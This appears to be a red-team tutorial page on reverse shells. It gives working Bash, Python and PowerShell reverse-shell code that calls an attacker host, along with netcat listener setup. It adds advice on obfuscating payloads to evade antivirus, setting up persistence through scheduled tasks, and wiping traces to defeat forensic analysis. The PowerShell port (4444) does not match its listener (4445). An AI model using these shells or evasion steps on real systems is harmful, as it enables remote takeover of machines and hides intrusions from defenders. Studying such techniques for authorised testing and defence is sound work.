Reverse Shell 101

Reverse Shell 101: Practical Insights for Red Teamers

In the dynamic world of red teaming, mastering the use of reverse shells is crucial for maintaining access, maneuvering within a network, and escalating privileges stealthily. This section is designed to focus less on theoretical aspects and more on practical, real-world examples to empower red teamers with actionable skills.

Understanding Reverse Shells

A reverse shell is a type of shell where the target machine opens a connection to an attacking machine, which then has the ability to execute commands on the target. This is particularly useful in bypassing firewall rules that may block incoming connections but allow outgoing ones.

Setting Up a Basic Reverse Shell

Example 1: Bash Reverse Shell One of the simplest forms of reverse shells is using Bash. This can be effective in environments where Bash is available, and network restrictions are minimal.

bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Setup:

  • Attacker Machine (Kali Linux): Use nc -lvnp 4444 to listen on port 4444.

  • Target Machine: Execute the above Bash command replacing attacker_ip with the IP address of the attacker's machine.

Python Reverse Shell

Example 2: Python Reverse Shell Python's extensive standard library allows for the creation of a reverse shell with just a few lines of code.

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker_ip",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

Setup:

  • Attacker Machine: Start a listener with nc -lvnp 1234.

  • Target Machine: Run the Python script after replacing attacker_ip with the attacker's IP.

PowerShell Reverse Shell

Example 3: Windows PowerShell Reverse Shell PowerShell provides a powerful platform for Windows environments.

$Client = New-Object System.Net.Sockets.TCPClient("192.168.56.1", 4444);$Stream =$Client.GetStream();[byte[]]$Buffer = New-Object byte[] 1024;while(($I =$Stream.Read($Buffer, 0, 1024)) -ne 0){$Data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Buffer,0, $I);$SendBack = (iex $Data 2>&1 | Out-String );    $SendBack2  = $SendBack + 'PS ' + (pwd).Path + '> ';$SendByte = ([text.encoding]::ASCII).GetBytes($SendBack2);$Stream.Write($SendByte,0,$SendByte.Length);$Stream.Flush();}$Client.Close();

Setup:

  • Attacker Machine: Listen on the specified port using nc -lvnp 4445.

  • Target Machine: Execute the PowerShell command.

Real-World Application Scenarios

  • Scenario 1: Post-Exploitation Data Exfiltration After gaining initial access through a phishing attack, a reverse shell is established to move laterally within the network, searching for sensitive data to exfiltrate.

  • Scenario 2: Maintaining Persistence Reverse shells can be integrated into scheduled tasks or services to ensure persistence even after system restarts, providing continued access for ongoing exploitation.

  • Scenario 3: Bypassing Endpoint Protection Advanced reverse shells can be encoded or encrypted to evade antivirus detection, often using tools like shikata_ga_nai encoder in Metasploit or custom encryption routines.

Tips for Effective Use

  • Obfuscation: Always obfuscate the reverse shell code to avoid detection by network monitoring tools.

  • Randomize Ports: Use non-standard ports for reverse shells to avoid typical firewall rules.

  • Cleanup: Ensure to remove traces of the reverse shell after use to avoid detection during forensic analysis.

Conclusion

Understanding and implementing reverse shells are fundamental skills for any red teamer. By practicing these examples in controlled environments and adapting them to specific target scenarios, red teamers can enhance their capability to perform comprehensive security assessments and effectively demonstrate real-world attack vectors.

This hands-on approach ensures that red teamers are not only familiar with the theory but are also adept at applying these techniques in real-world scenarios to achieve their objectives efficiently and stealthily.

Last updated